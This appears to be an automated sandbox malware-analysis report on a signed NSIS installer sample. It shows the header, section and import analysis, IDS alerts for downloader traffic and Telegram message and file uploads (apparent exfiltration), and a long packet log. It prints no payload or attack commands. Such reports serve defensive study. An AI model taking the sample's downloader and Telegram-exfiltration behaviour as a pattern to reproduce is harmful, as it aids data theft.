The subject is identical to the issuer, so this is a self-issued certificate: "Digitally signed: true" above means only that an Authenticode blob is present, and confers no trust. Random dictionary words in the name fields and a non-routable e-mail domain are what a certificate generated for the sample itself looks like.
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:CAFF9D70A82A47086A02432BA34E47D5
                                                                                                                                                                          Thumbprint SHA-1:3441E08EA76A7351719C2FE3A63CBBDC93E7C06E
                                                                                                                                                                          Thumbprint SHA-256:B82825F7DBC8AA58D5850201B206CAEA35BC2B8AA8D2770A373DEC412F3059D3
                                                                                                                                                                          Serial:6CD8D88855E505EF8F1559CDA17967E6E882B8B6
Instruction (disassembly at the entrypoint 0x4034f7; the sequence matches the prologue of the standard Nullsoft installer stub, consistent with the file type above: a call with argument 0x8001 of the SetErrorMode kind, then a version query first with a 0x11C-byte structure and, if that fails, a 0x114-byte one)
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          sub esp, 000003F4h
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          push 00000020h
                                                                                                                                                                          pop edi
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          mov dword ptr [ebp-14h], ebx
                                                                                                                                                                          mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                          mov dword ptr [ebp-10h], ebx
                                                                                                                                                                          call dword ptr [004080CCh]
                                                                                                                                                                          mov esi, dword ptr [004080D0h]
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                          mov dword ptr [ebp-28h], ebx
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                          call esi
                                                                                                                                                                          test eax, eax
                                                                                                                                                                          jne 00007F7D84814F5Ah
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                          push eax
                                                                                                                                                                          call esi
                                                                                                                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                          neg ax
                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                          not eax
                                                                                                                                                                          and eax, ecx
                                                                                                                                                                          mov word ptr [ebp-2Ch], ax
                                                                                                                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                          jnc 00007F7D84814F2Ah
                                                                                                                                                                          and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                          mov dword ptr [0042A2D8h], eax
                                                                                                                                                                          xor eax, eax
                                                                                                                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8504           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x54000          0x159b8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x110e00         0x708         (raw file offset, outside every section)
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Two things to check here by hand. The SECURITY entry is a file offset, not an RVA: 0x110e00 + 0x708 = 0x111508 = 1'119'496, exactly the file size, so the Authenticode blob is the last thing in the file and nothing is appended after it. There is no relocation directory and the file header says RELOCS_STRIPPED, so the DYNAMIC_BASE flag in the DLL characteristics is ineffective and the image always loads at its preferred base 0x400000.
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text   0x1000           0x6515        0x6600    26e66bea3b62728a217ae7bf343ebc1a  False     0.6615349264705882  data       6.439707948554623  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x139a        0x1400    691f0273dad50ec603f6fedf850b58ee  False     0.45                data       5.145774564074664  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x20338       0x600     4b75405561a3fcc45b8fe27a6808f3b5  False     0.4993489583333333  data       4.013698650446401  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2b000          0x29000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x54000          0x159b8       0x15a00   99e35a8b4499e294dd3cd1daedb48858  False     0.8200754154624278  data       7.353353976387772  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
The sections are contiguous on the 0x1000 alignment (.text 0x1000 + 0x6515 rounds to 0x8000, .rdata to 0xa000, .data 0xa000 + 0x20338 to 0x2b000, .ndata 0x2b000 + 0x29000 = 0x54000). .ndata has no bytes on disk (the MD5 is that of the empty string), which is the NSIS stub's uninitialized data section, not a packer artifact. The raw sizes total only 0x1da00 bytes, so nearly 1 MB of the 1'119'496-byte file lies between the end of .rsrc and the signature at 0x110e00: that is the installer overlay, the compressed NSIS archive, and it is what drives the whole-file entropy of 7.97 when no section exceeds 7.35.
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x54418 | 0x9e8c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9934217009953681
RT_ICON | 0x5e2a8 | 0x3344 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9758457787259982
RT_ICON | 0x615f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.41275933609958504
RT_ICON | 0x63b98 | 0x1743 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9952980688497062
RT_ICON | 0x652e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4580206378986867
RT_ICON | 0x66388 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.5692963752665245
RT_ICON | 0x67230 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.6601985559566786
RT_ICON | 0x67ad8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5
RT_ICON | 0x68140 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.5238439306358381
RT_ICON | 0x686a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6063829787234043
RT_ICON | 0x68b10 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6747311827956989
RT_ICON | 0x68df8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.8074324324324325
RT_DIALOG | 0x68f20 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x69020 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x69140 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x69208 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x69268 | 0xae | data | English | United States | 0.632183908045977
RT_VERSION | 0x69318 | 0x274 | data | English | United States | 0.47611464968152867
RT_MANIFEST | 0x69590 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States | (map image not captured)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T19:17:25.955766+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49905 | 142.250.185.174 | 443 | TCP
2025-01-10T19:17:30.902465+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49937 | 132.226.247.73 | 80 | TCP
2025-01-10T19:17:32.355634+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49937 | 132.226.247.73 | 80 | TCP
2025-01-10T19:17:33.182363+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49955 | 104.21.96.1 | 443 | TCP
2025-01-10T19:17:34.605637+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49960 | 193.122.6.168 | 80 | TCP
2025-01-10T19:17:35.149863+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49969 | 104.21.96.1 | 443 | TCP
2025-01-10T19:17:47.167816+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49997 | 149.154.167.220 | 443 | TCP
2025-01-10T19:17:53.897388+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.5 | 49998 | 149.154.167.220 | 443 | TCP
2025-01-10T19:17:56.507059+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.5 | 50000 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 19:17:24.815556049 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:24.815603971 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:24.815778971 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:24.831197023 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:24.831234932 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.568924904 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.569010973 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.569706917 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.569775105 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.627352953 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.627413034 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.627844095 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.627981901 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.629781008 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.671374083 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.955779076 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.955838919 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.955863953 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.955904007 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.956127882 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.956165075 CET | 443 | 49905 | 142.250.185.174 | 192.168.2.5
Jan 10, 2025 19:17:25.956219912 CET | 49905 | 443 | 192.168.2.5 | 142.250.185.174
Jan 10, 2025 19:17:25.989639997 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:25.989667892 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:25.989731073 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:25.990130901 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:25.990145922 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:26.632980108 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:26.633058071 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:26.638583899 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:26.638598919 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:26.638936996 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:26.639033079 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:26.639905930 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:26.683341026 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.665683985 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.665762901 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.665807009 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.665831089 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.665846109 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.665870905 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672418118 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672502995 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672503948 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672523022 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672569990 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672595024 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672641039 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672651052 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672689915 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672698021 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672728062 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672734976 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672743082 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672791004 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.672797918 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.672859907 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.673472881 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.673532009 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.673538923 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.673588037 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.673618078 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.673624039 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.673635006 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.673666000 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.673672915 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.673707008 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.674277067 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.674355030 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.674395084 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.674401045 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.674408913 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.674454927 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.675153971 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.675209045 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.675245047 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.675296068 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.675367117 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.675426960 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.675468922 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.675514936 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.675959110 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.676017046 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.676147938 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.676202059 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
Jan 10, 2025 19:17:29.676239967 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.676392078 CET | 443 | 49916 | 216.58.212.161 | 192.168.2.5
Jan 10, 2025 19:17:29.676450014 CET | 49916 | 443 | 192.168.2.5 | 216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.676456928 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.676498890 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.677081108 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.677145004 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.677174091 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.677217960 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.677278996 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.677433014 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.677619934 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.677835941 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.677843094 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.677891016 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.677992105 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678229094 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.678236008 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678286076 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.678394079 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678461075 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.678492069 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678544044 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.678592920 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678642035 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.678819895 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678869963 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.678905964 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.678946018 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.679204941 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.679459095 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.679469109 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.679476023 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.679512024 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.679537058 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.679586887 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.679639101 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.679800034 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.679943085 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.680103064 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.680160999 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.680350065 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.680408001 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.680490017 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.680577040 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.680591106 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.680636883 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.680795908 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.681039095 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.681046009 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.681109905 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.681122065 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.681400061 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.681406021 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.681457043 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.681474924 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.681555986 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.681655884 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.681715965 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.682760000 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.682826996 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.682852030 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.682905912 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.682941914 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.683008909 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.683032990 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.683083057 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.683110952 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.683166981 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.683202982 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.683254957 CET49916443192.168.2.5216.58.212.161
